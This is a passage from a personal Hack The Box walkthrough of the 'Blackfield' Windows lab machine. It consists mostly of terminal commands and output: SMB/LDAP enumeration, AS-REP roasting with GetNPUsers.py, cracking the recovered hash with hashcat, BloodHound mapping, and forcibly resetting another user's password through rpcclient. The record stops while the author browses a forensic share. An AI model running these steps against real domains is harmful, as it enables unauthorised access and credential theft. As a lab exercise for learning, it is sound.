This is a windows machine from hack the box.
nmap scan
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:19 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.28 seconds
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA -Pn blackfield 10.10.10.192
Output filename begins with '-'. Try '-oA ./-Pn' if you really want it to be named as such.
QUITTING!
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nmap -sV -sC -oA blackfield 10.10.10.192 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:20 EDT
Nmap scan report for 10.10.10.192
Host is up (0.35s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-10 08:20:46Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-09-10T08:21:08
|_ start_date: N/A
|_clock-skew: 7h00m02s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.68 seconds
using crackmap exec on 445
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192-u "" up ""
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
checking on shares
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 –shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
┌──(kali㉿kali)-[~/HTB/blackfield]
add blackfield.local to hosts file
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.161 htb.local
10.10.10.192 blackfield.local
try ldpsearch –ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts then ldapsearch -x -H ldap://10.10.10.192 -b ‘DC=blackfield,DC=local’ -s sub ‘(objectClass=person)’ sAMAccountName | grep ‘sAMAccountName:’ | awk -F ‘: ‘ ‘{print $2}’
no names
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingcontexts: DC=BLACKFIELD,DC=local
namingcontexts: CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=BLACKFIELD,DC=local
namingcontexts: DC=DomainDnsZones,DC=BLACKFIELD,DC=local
namingcontexts: DC=ForestDnsZones,DC=BLACKFIELD,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub '(objectClass=person)' sAMAccountName | grep 'sAMAccountName:' | awk -F ': ' '{print $2}'
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
tried again without the grep
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ldapsearch -x -H ldap://10.10.10.192 -b 'DC=blackfield,DC=local' -s sub
# extended LDIF
#
# LDAPv3
# base <DC=blackfield,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v4563
# numResponses: 1
Trying with rpcclient and we are in. checking some commands but no access
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ''
Password for [WORKGROUP\]:
rpcclient
gt; enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient
gt; Password for [WORKGROUP\]:
rpcclient
gt; enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient
gt;
^C
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U ”
Password for [WORKGROUP\]:
rpcclient
gt; netsharenum
command not found: netsharenum
rpcclient
gt; netshareenum
result was WERR_ACCESS_DENIED
rpcclient
gt;
trying GetNPUsers.py
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py -dc-ip 10.10.10.192 -request 'blackfield.local/'
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$
did a full nmap sacan
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ nmap -p- -T4 -oA full 10.10.10.192 -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-09 21:55 EDT
Nmap scan report for blackfield.local (10.10.10.192)
Host is up (0.34s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 564.16 seconds
checked smb shares
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient -L //10.10.10.192
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
there is a folder called forensic. we can recursivly check this with
smbclient //10.10.10.192/forensic -U “”%””
┌──(kali㉿kali)-[~/HTB/Forest]
└─$ smbclient //10.10.10.192/forensic -U ""%""
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/HTB/Forest]
tried enum4linux – no luck
┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.10.10.192
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Sep 9 23:03:37 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.192
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.192 )============================
[E] Can't find workgroup/domain
===================================( Session Check on 10.10.10.192 )===================================
[+] Server 10.10.10.192 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.192 )================================
Domain Name: BLACKFIELD
Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
[+] Host is part of a domain (not a workgroup)
=================================( Share Enumeration on 10.10.10.192 )=================================
do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.192
enum4linux complete on Sat Sep 9 23:04:04 2023
checked the profiles$ — smbclient \\10.10.10.192\profiles$ -U ”
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ smbclient \\\\10.10.10.192\\profiles$ -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
ACheretei D 0 Wed Jun 3 12:47:11 2020
ACsonaki D 0 Wed Jun 3 12:47:11 2020
AHigchens D 0 Wed Jun 3 12:47:11 2020
AJaquemai D 0 Wed Jun 3 12:47:11 2020
AKlado D 0 Wed Jun 3 12:47:11 2020
outputting all these to a users.txt file
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ more users.txt
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
cleaned the file so that left only with username –awk ‘{print $1}’ users.txt > cleaned_users.txt
──(kali㉿kali)-[~/HTB/blackfield]
└─$ awk '{print $1}' users.txt > cleaned_users.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ nano cleaned_users.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
blackfield.gnmap blackfield.nmap blackfield.xml cleaned_users.txt kerbrute users.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
addded “administrator” on the text file then use kerbrute to see which usernames are valid
./kerbrute userenum --dc 10.10.10.192 -d blackfield.LOCAL cleaned_users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/09/23 - Ronnie Flathers @ropnop
2023/09/09 23:24:27 > Using KDC(s):
2023/09/09 23:24:27 > 10.10.10.192:88
2023/09/09 23:24:33 > [+] VALID USERNAME: [email protected]
2023/09/09 23:24:50 > [+] VALID USERNAME: [email protected]
2023/09/09 23:27:01 > [+] VALID USERNAME: [email protected]
2023/09/09 23:27:01 > [+] VALID USERNAME: [email protected]
We get the user audit2020,support and svc_backup
we try GetNPUsers.py blackfield.LOCAL/audit2020 etc
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/audit2020
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate audit2020, getting its TGT
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/support
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate support, getting its TGT
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/svc_backup
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[*] Cannot authenticate svc_backup, getting its TGT
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
we get support. we try and crack with hashcat
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd ~/usr/bin
cd: no such file or directory: /home/kali/usr/bin
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ cd /usr/bin
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat --example-hashes | less
Hash mode #18200
Name................: Kerberos 5, etype 23, AS-REP
Category............: Network Protocol
Slow.Hash...........: No
Password.Len.Min....: 0
Password.Len.Max....: 256
Salt.Type...........: Embedded
Salt.Len.Min........: 0
Salt.Len.Max........: 256
Kernel.Type(s)......: pure, optimized
Example.Hash.Format.: plain
Example.Hash........: [email protected]:3e156ada591263b8a...102ac [Truncated, use --mach for full length]
Example.Pass........: hashcat
Benchmark.Mask......: ?b?b?b?b?b?b?b
Autodetect.Enabled..: Yes
Self.Test.Enabled...: Yes
Potfile.Enabled.....: Yes
Custom.Plugin.......: No
Plaintext.Encoding..: ASCII, HEX
copy the has to file
“`bash
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ cat blackfield
$krb5asrep
23
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ clear
Try and crack with hashcat and cracked as #00^BlackKnight
┌──(kali㉿kali)-[/usr/bin]
└─$ ./hashcat -m 18200 /home/kali/HTB/blackfield/blackfield /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 4.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-1160G7 @ 1.20GHz, 2815/5694 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
[email protected]:3c5c336ce929e0beda492ad47245cc2a$2cb24cd5709ede658b22a57e3379eb58f75b456581f7774e0a574206e84fd9207af192d18a0cd36d0092a59a59493040b6be0e81201dac42c805b16a026e23b6f7ab4f0661046fe769d6c8b8efcee2783b33041a147e5c22b16f14b92b85036062f8280e875a44ec0fb8c66e50d457e6b5825327ca52d8090837474f2f6fc6f234bb9151ed684a148833e5043e7b7e01840fbad876a22cdb815c77d74024d297c924cfc18eb42f9ff189abe04e6e2d6cf3d0fd4011e997ed472562a95294e4c3f08005ebb09495889a080e5741f9c6efe84a31daa26735e78f64aa2886c1fce0f827c267bc6d03b8e3a560f4ea73f364c4a1f2ab:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: [email protected]:3c5c336ce929...a1f2ab
Time.Started.....: Sat Sep 9 23:39:08 2023 (30 secs)
Time.Estimated...: Sat Sep 9 23:39:38 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 465.6 kH/s (2.91ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 73%
Started: Sat Sep 9 23:39:06 2023
Stopped: Sat Sep 9 23:39:39 2023
try crackmapexec and we get the shares
└─$ crackmapexec smb 10.10.10.192 --shares -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
lets try with winrm – no luck
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u support -p '#00^BlackKnight'
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\support:#00^BlackKnight
┌──(kali㉿kali)-[~/HTB/blackfield]
try rpcclient with the support credentials then we do an enumaration of domain users — enumdomusers and we get a bunch of usernames
rpcclient
gt; enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
user:[BLACKFIELD189208] rid:[0x453]
user:[BLACKFIELD404458] rid:[0x454]
user:[BLACKFIELD706381] rid:[0x455]
user:[BLACKFIELD937395] rid:[0x456]
user:[BLACKFIELD553715] rid:[0x457]
user:[BLACKFIELD840481] rid:[0x458]
user:[BLACKFIELD622501] rid:[0x459]
user:[BLACKFIELD787464] rid:[0x45a]
user:[BLACKFIELD163183] rid:[0x45b]
user:[BLACKFIELD869335] rid:[0x45c]
user:[BLACKFIELD319016] rid:[0x45d]
We output this to a file and lean it so we only have the usernames . Then we use kerbrute by going through each user via bash command as below
while read -r user; do
./GetNPUsers.py blackfield.LOCAL/$user -no-pass -dc-ip 10.10.10.192
done < /home/kali/HTB/blackfield/cleanusers2.txt
we get output as below and we get no hash so no luck
./GetNPUsers.py blackfield.LOCAL/$user -no-pass -dc-ip 10.10.10.192
done < /home/kali/HTB/blackfield/cleanusers2.txt
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD764430
[-] User BLACKFIELD764430 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD538365
[-] User BLACKFIELD538365 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD189208
[-] User BLACKFIELD189208 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Getting TGT for BLACKFIELD404458
[-] User BLACKFIELD404458 doesn't have UF_DONT_REQUIRE_PREAUTH set
Impacket v0.11.0 - Copyright 2023 Fortra
We try a python script — bloodhound.py. I want to use the bloodhound 3. so we install as below
Bloodhound.py is the same as shapehound but running it from the linux machine and will generate some json that we can import to bloodhound
pip install BloodHound==1.1.1
add the directory to the path
export PATH=$PATH:/home/kali/.local/bin
we then run the command — bloodhound-python -u support -p ‘#00^BlackKnight’ -ns 10.10.10.192 -d blackfield.local -c all
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 01M 12S
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ls
20230910090640_computers.json 20230910090640_users.json blackfield.nmap cleanusers2.txt users.txt
20230910090640_domains.json blackfield blackfield.xml kerbrute
20230910090640_groups.json blackfield.gnmap cleaned_users.txt users2.txt
┌──(kali㉿kali)-[~/HTB/blackfield]
We start neo4j and also bloodhound and load these files
neo4j
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ sudo neo4j console
[sudo] password for kali:
Sorry, try again.
[sudo] password for kali:
Active database: graph.db
Directories in use:
home: /var/lib/neo4j
config: /etc/neo4j
logs: /var/log/neo4j
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
run: /var/run/neo4j
Starting Neo4j.
WARNING: Max 1024 open files allowed, minimum of 40000 recommended. See the Neo4j manual.
2023-09-10 13:10:15.848+0000 INFO ======== Neo4j 3.5.35 ========
2023-09-10 13:10:15.891+0000 INFO Starting...
2023-09-10 13:10:20.194+0000 INFO Bolt enabled on 127.0.0.1:7687.
2023-09-10 13:10:23.362+0000 INFO Started.
2023-09-10 13:10:25.396+0000 INFO Remote interface available at http://localhost:7474/
2023-09-10 13:10:47.620+0000 WARN The client is unauthorized due to authentication failure.
bloodhound
└─$ ls
BloodHound-3.0.5 BloodHound-3.0.5.zip BloodHound-linux-x64 'BloodHound-linux-x64(1).zip'
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3]
└─$ cd BloodHound-linux-x64
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ls
BloodHound icudtl.dat libvk_swiftshader.so locales swiftshader
chrome_100_percent.pak libEGL.so libvulkan.so resources v8_context_snapshot.bin
chrome_200_percent.pak libffmpeg.so LICENSE resources.pak version
chrome-sandbox libGLESv2.so LICENSES.chromium.html snapshot_blob.bin vk_swiftshader_icd.json
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ./BloodHound
(node:358673) [DEP0005] DeprecationWarning: Buffer() is deprecated due to security and usability issues. Please use the Buffer.alloc(), Buffer.allocUnsafe(), or Buffer.from() methods instead.
i am going to try aclpwn to see what i can get after loading to bloodhound
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ ~/.local/bin/aclpwn -f [email protected] -t blackfield.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.192 -sp '#00^BlackKnight'
[!] No path found!
┌──(kali㉿kali)-[~/HTB/blackfield]
manually looking at the bloodhound and we see support can change the password for AUDIT2020
![[Pasted image 20230910213306.png]]
we can change the password from Rpcclient using this command i got from chatGPT –rpcclient $> setuserinfo2 [username] 23 ‘[newpassword]’
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ rpcclient 10.10.10.192 -U support
Password for [WORKGROUP\support]:
rpcclient
gt; setuserinfo2 audit2020 23 ‘Password123!’
rpcclient
gt;
we try crackmapexec with winrm -- no luck on winrm
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password123!'
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123!
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u audit2020 -p 'Password123!'
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [-] BLACKFIELD.local\audit2020:Password123!
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
checking the shares by this user — crackmapexec smb 10.10.10.192 -u audit2020 -p ‘Password123!’ –shares
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'Password123!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/HTB/blackfield]
└─$
We can now read the forensic folder
We open this using smbclient — smbclient \\10.10.10.192\forensic -U audit2020%’Password123!’. I then get all the txt files i see
└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1678453 blocks available
smb: \> cd commands_output
smb: \commands_output\> ls
. D 0 Sun Feb 23 13:14:37 2020
.. D 0 Sun Feb 23 13:14:37 2020
domain_admins.txt A 528 Sun Feb 23 08:00:19 2020
domain_groups.txt A 962 Sun Feb 23 07:51:52 2020
domain_users.txt A 16454 Fri Feb 28 17:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 07:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 07:50:28 2020
netstat.txt A 3842 Sun Feb 23 07:51:01 2020
route.txt A 3976 Sun Feb 23 07:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 07:56:59 2020
tasklist.txt A 9990 Sun Feb 23 07:54:29 2020
5102079 blocks of size 4096. 1678453 blocks available
smb: \commands_output\> cat domain_users.txt
cat: command not found
smb: \commands_output\> get domain_admins.txt
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \commands_output\> get *.txt
NT_STATUS_OBJECT_NAME_INVALID opening remote file \commands_output\*.txt
smb: \commands_output\> get domain_groups.txt
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (0.7 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \commands_output\> get domain_users.txt
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (11.7 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \commands_output\>
When we cat domain usere.txt we see a new user Ipwn3dYouCompany
BLACKFIELD969352 BLACKFIELD971417 BLACKFIELD978938
BLACKFIELD990638 BLACKFIELD991588 BLACKFIELD994577
BLACKFIELD995218 BLACKFIELD996878 BLACKFIELD997545
BLACKFIELD998321 Guest Ipwn3dYouCompany
krbtgt lydericlefebvre support
Ipwn3dYouCompany
Il try and see if we can get the hash
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./GetNPUsers.py blackfield.LOCAL/Ipwn3dYouCompany
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
[-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
check the other folder
└─$ smbclient \\\\10.10.10.192\\forensic -U audit2020%'Password123!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1678438 blocks available
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
. D 0 Thu May 28 16:28:33 2020
.. D 0 Thu May 28 16:28:33 2020
conhost.zip A 37876530 Thu May 28 16:25:36 2020
ctfmon.zip A 24962333 Thu May 28 16:25:45 2020
dfsrs.zip A 23993305 Thu May 28 16:25:54 2020
